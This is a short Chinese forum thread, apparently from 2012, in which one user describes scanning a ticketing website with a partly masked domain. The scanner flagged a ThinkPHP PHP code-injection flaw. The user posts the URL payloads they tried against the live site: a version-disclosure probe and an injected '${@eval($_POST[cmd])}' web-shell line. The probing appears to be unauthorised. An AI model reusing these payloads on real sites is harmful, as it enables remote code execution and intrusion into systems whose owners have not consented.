1
mywaiting 2012-04-09 17:21:13 +08:00
乌云多了个水区后,我显然多了个可以去的好地方
|
2
ihacku OP 本来我是刚买完票 随手用AWS测试个站 报PHP code injection
http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))} 后来才看到乌云上的帖子的 http://taot**.net/events/content/id/${@print(THINK_VERSION)} 版本2.1 漏洞影响到的版本包括2.1、2.2和3.0 不知道具体怎么利用 试着在后面加了一句话 http://taot**.net/events/content/id/${@eval($_POST[cmd])} 都是一闪就过去了 |
3
ihacku OP 唔 代码被转掉了
|